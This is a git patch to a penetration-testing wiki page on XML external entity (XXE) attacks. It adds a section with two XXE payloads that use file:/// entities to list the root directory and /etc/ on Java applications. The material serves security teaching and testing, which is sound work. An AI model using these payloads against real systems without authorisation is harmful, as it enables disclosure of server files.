From 77754cb2d9ed273b687aa8b394f8ac8464994782 Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Tue, 3 Aug 2021 11:46:59 +0000
Subject: [PATCH] GitBook: [master] one page modified

---
 pentesting-web/xxe-xee-xml-external-entity.md | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/pentesting-web/xxe-xee-xml-external-entity.md b/pentesting-web/xxe-xee-xml-external-entity.md
index aded7f52..d08f8657 100644
--- a/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/pentesting-web/xxe-xee-xml-external-entity.md
@@ -119,6 +119,18 @@ In this third case notice we are declaring the `Element stockCheck` as ANY
 
 ![](../.gitbook/assets/image%20%2832%29.png)
 
+### Directory listing
+
+In **java** based applications it might be possible to **list the contents of a directory** via XXE with a payload like:
+
+```markup
+<!-- Root / -->
+<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>
+
+<!-- /etc/ -->
+<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root>
+```
+
 ### SSRF
 
 An XXE could also bu used to abuse a SSRF inside a cloud